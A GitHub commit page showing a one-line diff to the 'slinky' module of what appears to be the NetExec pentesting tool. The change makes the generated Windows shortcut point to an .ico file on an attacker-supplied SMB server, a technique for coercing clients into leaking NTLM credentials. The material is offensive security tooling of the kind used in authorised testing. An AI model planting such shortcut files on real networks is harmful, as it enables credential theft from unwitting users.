Skip to content

Commit 0565e4e

Browse files
authored
Use ico extension as target
Signed-off-by: Geetub <17295502+Geetub@users.noreply.github.com>
1 parent b974d3d commit 0565e4e

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

nxc/modules/slinky.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -67,7 +67,7 @@ def options(self, context, module_options):
6767

6868
if not self.cleanup:
6969
self.server = module_options["SERVER"]
70-
target_path = f"\\\\{self.server}\\share\\{self.lnk_name}.exe"
70+
target_path = f"\\\\{self.server}\\share\\{self.lnk_name}.ico"
7171
pylnk3.for_file(target_path, self.local_lnk_path)
7272

7373
def on_login(self, context, connection):

0 commit comments

Comments
 (0)